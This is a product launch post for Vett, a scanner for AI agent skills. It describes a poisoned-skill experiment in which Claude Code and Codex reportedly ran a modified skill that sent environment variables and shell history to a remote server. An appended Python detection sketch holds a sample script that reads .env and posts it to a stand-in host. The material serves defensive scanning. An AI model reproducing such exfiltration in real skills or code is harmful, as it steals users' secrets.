Launching today

vett
Scan, sign, and verify AI agent skills before installing
When you install an AI agent skill, you're running code pulled from GitHub at HEAD with no signing, versioning, or scanning. Vett scans every skill before it reaches your machine: static analysis, exfiltration chain detection, OSV dependency checks, and Sigstore signing. Early scans have already turned up malware disguised as Google and LinkedIn tools, and skills with thousands of installs that quietly modify your agent's own configuration files.







Hey Product Hunt
When you install an AI agent skill, you're trusting a GitHub repo you've never audited, pulled at HEAD with no signing, scanning, or versioning. I took an official skill, added a few lines to exfiltrate environment variables and shell history to a remote server, and installed it into Claude Code and Codex. Both ran the script without question.
How Vett works:
The static analyzer runs across every skill before installation: 40+ detection rules, AST-based data flow tracking for JS/TS, and source-to-sink exfiltration chain detection. A script that reads .env and makes an outbound HTTP request is flagged as an exfiltration chain, not two separate findings. Dependencies get checked against the OSV vulnerability database, and clean skills get Sigstore signing. For ambiguous cases, a second pass uses an LLM to compare observed behavior against declared purpose.
Early scans have revealed malware disguised as Google and LinkedIn tools, as well as skills with thousands of installations that quietly modify your agent's own configuration files.
Questions, feedback, and poking holes in the detection approach are all welcome.
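The source-to-sink chaining described in the post above, as an added sketch that is not Vett's code and not part of the original post. It applies the idea to Python source with the standard-library `ast` module (the page's analyzer targets JS/TS), so a secret read that flows into a network call is reported as one chain, while a read and an unrelated request produce none. The suffix list, sink list and sample scripts are assumptions constructed for the example, and the tracking is straight-line only (no branches or function calls).

```python
import ast

# Assumed rules for this sketch; these are not Vett's detection rules.
SENSITIVE_SUFFIXES = (".env", "_history", "id_rsa")
SINKS = {"requests.post", "requests.get", "urllib.request.urlopen"}

def dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, '' for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if not isinstance(node, ast.Name):
        return ""
    return ".".join([node.id] + parts[::-1])

def is_source(expr):
    """True if expr reads os.environ or open()s a path with a sensitive suffix."""
    for sub in ast.walk(expr):
        if dotted(sub) == "os.environ":
            return True
        if isinstance(sub, ast.Call) and dotted(sub.func) == "open" and any(
                isinstance(c, ast.Constant) and str(c.value).endswith(SENSITIVE_SUFFIXES)
                for c in ast.walk(sub)):
            return True
    return False

def origin(expr, tainted):
    """Line where the secret feeding expr was read, or None if expr is clean."""
    if is_source(expr):
        return expr.lineno
    hits = [tainted[n.id] for n in ast.walk(expr)
            if isinstance(n, ast.Name) and n.id in tainted]
    return hits[0] if hits else None

def find_exfil_chains(code):
    """Return one (source_line, sink_line, sink) tuple per secret-to-network flow."""
    tainted, chains = {}, []  # tainted: variable name -> line of the secret read
    nodes = [n for n in ast.walk(ast.parse(code)) if isinstance(n, (ast.Assign, ast.Call))]
    for n in sorted(nodes, key=lambda n: (n.lineno, n.col_offset)):
        if isinstance(n, ast.Assign):
            line = origin(n.value, tainted)
            for t in (t for t in n.targets if isinstance(t, ast.Name)):
                tainted.pop(t.id, None)  # reassignment clears old taint
                if line is not None:
                    tainted[t.id] = line
        elif dotted(n.func) in SINKS:
            lines = [origin(a, tainted) for a in n.args + [k.value for k in n.keywords]]
            lines = [x for x in lines if x is not None]
            if lines:
                chains.append((lines[0], n.lineno, dotted(n.func)))
    return chains

# Constructed samples: the first sends .env contents out, the second only reads them.
CHAINED = 'import requests\nsecret = open(".env").read()\nbody = {"e": secret}\nrequests.post("https://collector.example/u", json=body)\n'
UNRELATED = 'import requests\ncfg = open(".env").read()\nprint(len(cfg))\nrequests.get("https://api.example/status")\n'
```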